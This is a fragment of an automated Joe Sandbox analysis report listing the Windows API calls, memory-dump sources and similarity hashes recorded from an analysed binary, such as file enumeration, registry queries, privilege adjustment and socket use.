                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A269
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7A285
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7A2D5
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00FC7B94), ref: 00F7A2F3
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7A2FD
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A30A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A31A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F6E3B4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a5106fdf73e606889c1bde39dc854f8c1c09c5c5b5a905f5f95f9528f4d22db
                                                                                                                                                                                                                                                                                        • Instruction ID: e1299891c5683772b4a2f8ff99b0e1866dc0ae84df3679bca9e59f7150a932d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a5106fdf73e606889c1bde39dc854f8c1c09c5c5b5a905f5f95f9528f4d22db
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E31053290061D6ADB10AFB4EC09EDE77AC9F85334F258196E818A3091DB35DE45EE16
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C99E
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F8CA09
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8CA2D
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8CA8C
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8CB47
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CBB4
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CC49
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CC9A
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CD43
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8CDE2
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8CDEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 465d815fff2cf732fe0f662b4fadbe58a985126bd99118829b3583af6bfe8da1
                                                                                                                                                                                                                                                                                        • Instruction ID: e5d683ae7c3b20eb7731a41d765a30c42f69add4a36392c9dc25a9e04388ddc1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 465d815fff2cf732fe0f662b4fadbe58a985126bd99118829b3583af6bfe8da1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14026371A042009FD714EF24C895E6ABBE5EF49314F18849DF849CB2A2C735ED46EBA1
APIs
  • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
  • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 00F6D9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F6DA88
• MoveFileW.KERNEL32(?,?), ref: 00F6DA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6DAE2
  • Part of subcall function 00F6DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F6DAC7,?,?), ref: 00F6DB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 00F6DAFE
• FindClose.KERNEL32(00000000), ref: 00F6DB0F
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
APIs
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00F62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
  • Part of subcall function 00F62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
  • Part of subcall function 00F62010: GetLastError.KERNEL32 ref: 00F62097
• ExitWindowsEx.USER32(?,00000000), ref: 00F6F249
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
APIs
• _free.LIBCMT ref: 00F3BD54
• _free.LIBCMT ref: 00F3BD78
• _free.LIBCMT ref: 00F3BEFF
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FA46D0), ref: 00F3BF11
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FD221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F3BF89
• WideCharToMultiByte.KERNEL32(00000000,00000000,00FD2270,000000FF,?,0000003F,00000000,?), ref: 00F3BFB6
• _free.LIBCMT ref: 00F3C0CB
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F456C2,?,?,00000000,00000000), ref: 00F73A1E
                                                                                                                                                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F456C2,?,?,00000000,00000000), ref: 00F73A35
                                                                                                                                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE), ref: 00F73A45
                                                                                                                                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE), ref: 00F73A56
                                                                                                                                                                                                                                                                                        • LockResource.KERNEL32(00F456C2,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE,?), ref: 00F73A65
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F61916
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F61922
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F61931
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F61938
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F6194E
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00F61C81), ref: 00F620FB
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F62107
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F6210E
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F62127
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00F61C81), ref: 00F6213B
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F62142
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F7A5BD
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F7A6D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F742B9: GetInputState.USER32 ref: 00F74310
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F742B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F743AB
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F7A5ED
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F7A6BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,?), ref: 00F0233E
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F02421
                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00F02434
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$Proc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: _wcslen.LIBCMT ref: 00F83AF8
                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F822BA
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F822E1
                                                                                                                                                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00F82338
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F82343
                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00F82372
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00F7D8CE
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00F7D92F
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00F7D943
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00F446AC), ref: 00F6E482
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F6E491
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F6E4A2
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6E4AE
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                        • Opcode ID: 2be5c3d5167f6cb538c6a5eab8ff506333d470c327f2eb776b9043ce77e98ad5
                                                                                                                                                                                                                                                                                        • Instruction ID: 862661bfd25b5ad20ee3c97f81869f3bd7056b9f9938b26c4255a44c7ac71a26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2be5c3d5167f6cb538c6a5eab8ff506333d470c327f2eb776b9043ce77e98ad5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD012B7C1811DD6CB88DB909D89EB9737CBB28381F604456FE4691000E6249A4DBB21
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F32A8A
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F32A94
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F32AA1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea4e67594f4804475691ca658b3bdd78b81a05fd49576b451f24b0b98753993a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f37a3042e7c61bf9a0f86218587984a17ffdecaedc7543969b555aef6c44e84
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea4e67594f4804475691ca658b3bdd78b81a05fd49576b451f24b0b98753993a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4931B77590122C9BCB61DF68DD8979DBBB8BF08310F5041DAE80CA7251EB349F859F45
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F209D8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F209F5
                                                                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F62097
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cf28f2790a16b53aaaad89388b2630dc4eb86848bea8fa78031b7bbc1067e64e
                                                                                                                                                                                                                                                                                        • Instruction ID: 481d737aad2c17d6f5cb43d3901353ebffea4c456b6e2e36ce0d2ead80d9d46e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf28f2790a16b53aaaad89388b2630dc4eb86848bea8fa78031b7bbc1067e64e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111CEB2800304BFD718AF64ECC6E6BBBB8EB04710B20842EF04653291EB74BC41DB20
                                                                                                                                                                                                                                                                                        APIs
